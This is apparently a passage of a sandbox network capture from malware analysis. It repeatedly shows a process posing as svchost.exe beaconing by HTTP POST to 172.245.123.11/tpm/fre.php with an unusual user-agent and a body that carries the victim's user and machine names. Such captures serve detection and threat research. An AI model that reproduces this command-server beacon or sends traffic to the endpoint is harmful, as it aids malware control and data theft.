                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:13.753712893 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:13 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              25192.168.2.549738172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:13.910933971 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:13.915719986 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:14.420567036 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:14 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              26192.168.2.549739172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:14.570837021 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:14.575613976 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:15.079121113 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:14 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              27192.168.2.549740172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:15.236804008 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:15.241631031 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:15.751667976 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:15 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              28192.168.2.549741172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:15.893388033 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:15.898263931 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:16.407164097 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:16 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              29192.168.2.549742172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:16.556257963 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:16.561248064 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:17.069873095 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:16 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              30192.168.2.549748172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:17.271879911 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:17.278413057 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:17.794280052 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:17 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              31192.168.2.549754172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:17.954827070 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:17.961173058 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:18.478518009 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:18 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              32192.168.2.549760172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:18.635102987 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:18.640080929 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:19.157036066 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:19 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              33192.168.2.549766172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:19.322249889 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:19.327075005 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:19.851816893 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:19 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              34192.168.2.549772172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:20.038256884 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:20.043059111 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:20.564466000 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:20 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              35192.168.2.549778172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:20.737291098 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:20.742103100 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:21.267196894 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:21 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              36192.168.2.549784172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:21.426393032 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:21.431219101 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:21.949470043 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:21 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              37192.168.2.549790172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:22.117657900 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:22.122622013 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:22.615750074 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:22 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              38192.168.2.549795172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:22.796658039 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:22.801706076 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:23.331206083 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:23 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              39192.168.2.549801172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:23.519656897 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:23.524470091 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:24.058000088 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:23 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              40192.168.2.549804172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:24.242893934 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:24.248034000 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:24.758451939 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:24 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              41192.168.2.549810172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:24.973608971 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:24.981285095 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:25.495547056 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:25 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              42192.168.2.549815172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:25.665812969 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:25.670615911 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:26.181912899 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:26 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
